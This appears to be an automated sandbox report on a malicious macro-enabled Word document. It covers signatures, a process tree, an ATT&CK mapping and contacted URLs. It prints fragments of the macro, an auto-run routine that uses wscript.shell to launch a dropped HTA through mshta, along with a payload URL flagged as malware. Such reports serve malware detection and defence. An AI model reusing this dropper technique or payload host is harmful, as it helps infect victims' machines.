Source: instruct_11.21.doc.docmOLE, VBA macro line: dowYouKarol.exec "c:\windows\explorer " & dowGirlLoad
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: instruct_11.21.doc.docmOLE, VBA macro line: Set dowYouKarol = CreateObject("wscript.shell")
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function s, String wscript: Set dowYouKarol = CreateObject("wscript.shell")
Source: instruct_11.21.doc.docmOLE indicator has summary info: false
Source: ~WRF{C8F000F6-2878-4270-8CA4-E7B38F5CB954}.tmp.0.drOLE indicator has summary info: false
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: instruct_11.21.doc.docmOLE indicator application name: unknown
Source: ~WRF{C8F000F6-2878-4270-8CA4-E7B38F5CB954}.tmp.0.drOLE indicator application name: unknown
Source: instruct_11.21.doc.docmOLE, VBA macro line: Sub document_open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function document_open
Source: instruct_11.21.doc.docmOLE indicator, VBA macros: true
Source: ~WRF{C8F000F6-2878-4270-8CA4-E7B38F5CB954}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: instruct_11.21.doc.docmVirustotal: Detection: 49%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\explorer.exe c:\windows\explorer c:\users\public\powPowNext.hta
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\explorer.exe c:\windows\explorer c:\users\public\powPowNext.hta
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{C3E5254C-1D9D-4106-BDD1-A5AF4468DA85} - OProcSessId.datJump to behavior
Source: classification engineClassification label: mal92.expl.winDOCM@6/18@1/1
Source: instruct_11.21.doc.docmOLE document summary: title field not present or empty
Source: instruct_11.21.doc.docmOLE document summary: edited time not present or 0
Source: ~WRF{C8F000F6-2878-4270-8CA4-E7B38F5CB954}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{C8F000F6-2878-4270-8CA4-E7B38F5CB954}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{C8F000F6-2878-4270-8CA4-E7B38F5CB954}.tmp.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\explorer.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: instruct_11.21.doc.docmInitial sample: OLE summary keywords = ath.txeNwoPwop\cilbup\sresu\:c
Source: ~WRF{C8F000F6-2878-4270-8CA4-E7B38F5CB954}.tmp.0.drInitial sample: OLE indicators vbamacros = False
Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_057AB5B1 push esp; retf
Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_057AC44D push ebx; retf
Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: mshta.exe, 00000006.00000003.728480223.0000000008A91000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: explorer.exe, 00000005.00000002.921617169.0000000000B5A000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}U
Source: explorer.exe, 00000004.00000002.663261965.0000000000ED8000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000002.921617169.0000000000B5A000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\9
Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: page read and write | page guard
Source: explorer.exe, 00000005.00000002.921760286.00000000012C0000.00000002.00020000.sdmpBinary or memory string: Program Manager
Source: explorer.exe, 00000005.00000002.921760286.00000000012C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000002.921760286.00000000012C0000.00000002.00020000.sdmpBinary or memory string: Progman
Source: explorer.exe, 00000005.00000002.921760286.00000000012C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting22Path InterceptionProcess Injection2Masquerading1OS Credential DumpingQuery Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools11LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting22NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 520837 Sample: instruct_11.21.doc.docm Startdate: 12/11/2021 Architecture: WINDOWS Score: 92 17 Multi AV Scanner detection for domain / URL 2->17 19 Antivirus detection for URL or domain 2->19 21 Multi AV Scanner detection for submitted file 2->21 23 6 other signatures 2->23 6 explorer.exe 3 2->6         started        8 WINWORD.EXE 38 42 2->8         started        process3 process4 10 mshta.exe 23 6->10         started        13 explorer.exe 1 8->13         started        dnsIp5 15 shoulderelliottd.com 194.62.42.144, 80 ZEISS-ASRU Russian Federation 10->15

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
instruct_11.21.doc.docm49%VirustotalBrowse
instruct_11.21.doc.docm100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
shoulderelliottd.com10%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://en.wF0%Avira URL Cloudsafe
https://roaming.edog.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://api.aadrm.com0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK100%Avira URL Cloudmalware
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
shoulderelliottd.com
194.62.42.144
truetrueunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://en.wFmshta.exe, 00000006.00000003.713921343.0000000006569000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://api.diagnosticssdf.office.com24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
    high
    https://login.microsoftonline.com/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
      high
      https://shell.suite.office.com:144324FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
          high
          https://autodiscover-s.outlook.com/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
            high
            https://roaming.edog.24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
            • URL Reputation: safe
            unknown
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
              high
              https://cdn.entity.24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                    high
                    https://powerlift.acompli.net24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v124FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                      high
                      https://cortana.ai24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                high
                                https://api.aadrm.com/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                      high
                                      https://cr.office.com24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                        high
                                        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                        • Avira URL Cloud: safe
                                        low
                                        https://portal.office.com/account/?ref=ClientMeControl24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                          high
                                          https://graph.ppe.windows.net24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                            high
                                            https://res.getmicrosoftkey.com/api/redemptionevents24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://powerlift-frontdesk.acompli.net24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://tasks.office.com24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                              high
                                              https://officeci.azurewebsites.net/api/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/work24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                high
                                                https://store.office.cn/addinstemplate24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://api.aadrm.com24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                  high
                                                  https://globaldisco.crm.dynamics.com24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                    high
                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                      high
                                                      https://dev0-api.acompli.net/autodetect24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.odwebp.svc.ms24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.powerbi.com/v1.0/myorg/groups24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                        high
                                                        https://web.microsoftstream.com/video/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                          high
                                                          https://api.addins.store.officeppe.com/addinstemplate24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://graph.windows.net24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                            high
                                                            https://dataservice.o365filtering.com/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://officesetup.getmicrosoftkey.com24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://analysis.windows.net/powerbi/api24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                              high
                                                              https://prod-global-autodetect.acompli.net/autodetect24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office365.com/autodiscover/autodiscover.json24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                high
                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                  high
                                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                    high
                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                      high
                                                                      https://ncus.contentsync.24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
